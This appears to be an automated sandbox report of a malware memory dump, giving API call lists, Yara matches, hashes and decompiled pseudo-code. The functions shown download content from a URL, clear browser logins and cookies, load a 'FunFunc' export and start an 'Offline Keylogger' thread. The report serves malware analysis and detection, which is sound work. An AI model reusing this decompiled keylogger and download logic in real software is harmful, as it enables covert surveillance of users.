                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                        • String ID:
                                        • API String ID: 3851886811-0
                                        • Opcode ID: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                        • Opcode Fuzzy Hash: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                        • SystemParametersInfoW.USER32 ref: 00413580
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 3561681748-3576401099
                                        • Opcode ID: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                        • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                        • Opcode Fuzzy Hash: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                        • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
                                        				void* _v8;
                                        				char* _v12;
                                        				void* _v16;
                                        				void _v10016;
                                        				void* _t35;
                                        				void* _t36;
                                        				void* _t42;
                                        				void* _t44;
                                        				void* _t46;
                                        				unsigned int* _t55;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				signed int _t64;
                                        				signed int _t74;
                                        				char* _t98;
                                        				void* _t100;
                                        				void* _t101;
                                        				void* _t102;
                                        				void* _t103;
                                        
                                        				E00413ED0(0x271c, __ecx);
                                        				_t55 = _a12;
                                        				_a15 = _a15 & 0x00000000;
                                        				_t98 = 0;
                                        				 *_a8 = 0;
                                        				 *_t55 = 0;
                                        				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                        				_v16 = _t35;
                                        				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                        				_v8 = _t36;
                                        				if(_t36 != 0) {
                                        					_a12 = 0;
                                        					_a4 = 0;
                                        					while(1) {
                                        						_t10 =  &_a12; // 0x415664
                                        						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
                                        						if(_t42 != 0 && _a12 <= _t98) {
                                        							break;
                                        						}
                                        						_t44 =  *_t55 + _a12;
                                        						_push(_t44);
                                        						L00413E84();
                                        						_t57 =  *_t55;
                                        						_t100 = _a4;
                                        						_t58 = _t57 >> 2;
                                        						_v12 = memcpy(_t44, _t100, _t58 << 2);
                                        						_push(_a4);
                                        						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
                                        						_t101 =  &_v10016;
                                        						_t64 = _a12 >> 2;
                                        						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
                                        						_t103 = _t103 + 0x30;
                                        						L00413EBE();
                                        						_a4 = _v12;
                                        						 *_t55 =  *_t55 + _a12;
                                        						_t98 = 0;
                                        					}
                                        					_push( *_t55);
                                        					L00413E84();
                                        					_t102 = _a4;
                                        					 *_a8 = _t42;
                                        					_t74 =  *_t55 >> 2;
                                        					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
                                        					_a15 = 1;
                                        				}
                                        				InternetCloseHandle(_v16);
                                        				InternetCloseHandle(_v8);
                                        				return _a15;
                                        			}
                                        0x0041255b
                                        0x00412564
                                        0x00412568
                                        0x0041256c
                                        0x00412573
                                        0x0041257a
                                        0x0041257c
                                        0x0041258d
                                        0x00412591
                                        0x00412599
                                        0x0041259c
                                        0x004125a3
                                        0x004125a6
                                        0x004125a9
                                        0x004125a9
                                        0x004125bc
                                        0x004125c4
                                        0x00000000
                                        0x00000000
                                        0x004125cd
                                        0x004125d0
                                        0x004125d1
                                        0x004125d6
                                        0x004125d8
                                        0x004125df
                                        0x004125e6
                                        0x004125ec
                                        0x004125ef
                                        0x004125fa
                                        0x00412600
                                        0x0041260a
                                        0x0041260a
                                        0x0041260c
                                        0x00412615
                                        0x0041261b
                                        0x0041261e
                                        0x0041261e
                                        0x00412622
                                        0x00412624
                                        0x0041262a
                                        0x00412632
                                        0x00412638
                                        0x00412642
                                        0x00412644
                                        0x00412648
                                        0x00412652
                                        0x00412657
                                        0x0041265f

                                        APIs
                                        • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                        • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                        • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                        • InternetCloseHandle.WININET(?), ref: 00412652
                                        • InternetCloseHandle.WININET(00000000), ref: 00412657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                        • String ID: dVA$user
                                        • API String ID: 3314639739-756348157
                                        • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                        • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E004078BB(void* __ecx) {
                                        				signed int _v5;
                                        				signed int _v6;
                                        				signed int _v7;
                                        				signed int _v8;
                                        				void* _t40;
                                        				void* _t44;
                                        
                                        				_push(__ecx);
                                        				 *0x41b9b8 = 1;
                                        				Sleep( *0x41b9b4);
                                        				_v5 = _v5 & 0x00000000;
                                        				_v6 = _v6 & 0x00000000;
                                        				_v7 = _v7 & 0x00000000;
                                        				_v8 = _v8 & 0x00000000;
                                        				_t44 = 0;
                                        				do {
                                        					if(_v5 == 0) {
                                        						L2:
                                        						_v5 = E00407767();
                                        					}
                                        					if(_v6 == 0) {
                                        						_v6 = E0040751B();
                                        					}
                                        					if(_v8 == 0) {
                                        						_v8 = E0040728F();
                                        					}
                                        					if(_v7 == 0) {
                                        						_v7 = E004071CF();
                                        					}
                                        					if(_t44 == 0) {
                                        						_t44 = E0040710F();
                                        					}
                                        					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
                                        						Sleep(0x1388);
                                        					}
                                        					if(_v5 == 0) {
                                        						goto L2;
                                        					}
                                        				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				E00407A90("\n[Cleared browsers logins and cookies.]\n");
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
                                        				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
                                        				if( *0x41b9b0 != 0) {
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					E0040B829(0x80000001, _t40, "FR", 1);
                                        				}
                                        				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
                                        				return 0;
                                         			}

                                        APIs
                                        • Sleep.KERNEL32 ref: 004078D4
                                        • Sleep.KERNEL32(00001388), ref: 0040794C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                          • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                          • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                        Strings
                                        • [INFO], xrefs: 004079A1
                                        • Cleared browsers logins and cookies., xrefs: 0040798D
                                        • [Cleared browsers logins and cookies.], xrefs: 00407977
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                        • API String ID: 3797260644-945983296
                                        • Opcode ID: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                        • Opcode Fuzzy Hash: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                        				char _v20;
                                        				char _v36;
                                        				void* _t19;
                                        				void* _t20;
                                        				void* _t21;
                                        				intOrPtr _t24;
                                        				char* _t29;
                                        				void* _t38;
                                        				intOrPtr _t49;
                                        				void* _t50;
                                        				void* _t53;
                                        
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t49 =  *__eax;
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t53 = _t50 + 0x24;
                                        				_t19 = _t49 - 0x42;
                                        				if(_t19 == 0) {
                                        					_t20 = E0040180C( &_v20, __eflags, 0);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t21 = E00406DD9(_t20);
                                        					__eflags = _t21;
                                        					_pop(_t38);
                                        					if(_t21 != 0) {
                                        						_t24 = E00407033(_t21, "FunFunc");
                                        						_push(_t38);
                                        						 *0x41ba18 = _t24;
                                        						 *0x41ba1c = 1;
                                        						E00412855(_t38, _t53, 0x41bcf8);
                                        						E004020C2(_a4, 0x6d, _t38);
                                        					}
                                        				} else {
                                        					_t56 = _t19 == 1;
                                        					if(_t19 == 1) {
                                        						_t29 = E0040180C( &_v20, _t56, 0);
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        						 *0x41ba18(atoi(_t29));
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                         			}

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00407BAE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                        • atoi.MSVCRT ref: 00407BFC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                        • String ID: FunFunc
                                        • API String ID: 2980839617-81400306
                                        • Opcode ID: d4a57ff5cab0d8d4531b816436e077c30061a511b52593480f77deb3233660ff
                                        • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                        • Opcode Fuzzy Hash: d4a57ff5cab0d8d4531b816436e077c30061a511b52593480f77deb3233660ff
                                        • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 26%
                                        			E00405180(void* __ecx, char _a4) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t14;
                                        				void* _t18;
                                        				void* _t19;
                                        				void* _t29;
                                        				void* _t32;
                                        				char* _t33;
                                        				void* _t36;
                                        
                                        				_t19 = __ecx;
                                        				 *((char*)(__ecx + 0x3c)) = 1;
                                        				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
                                        				E00405156(__ecx);
                                        				_t33 = "Offline Keylogger Started";
                                        				if( *0x41b154 != 0x32) {
                                        					_t36 = _t36 - 0x10;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                        					E00405DD3(__ecx);
                                        				}
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
                                        				E0041203B();
                                        				CreateThread(0, 0, E0040528A, _t19, 0, 0);
                                        				if( *_t19 == 0) {
                                        					CreateThread(0, 0, E0040526A, _t19, 0, 0);
                                        				}
                                        				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t14;
                                         			}

                                        APIs
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                          • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                        • CreateThread.KERNEL32(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                        • CreateThread.KERNEL32(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                        • CreateThread.KERNEL32(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                        • String ID: Offline Keylogger Started$[INFO]
                                        • API String ID: 2375278975-3749928830
                                        • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
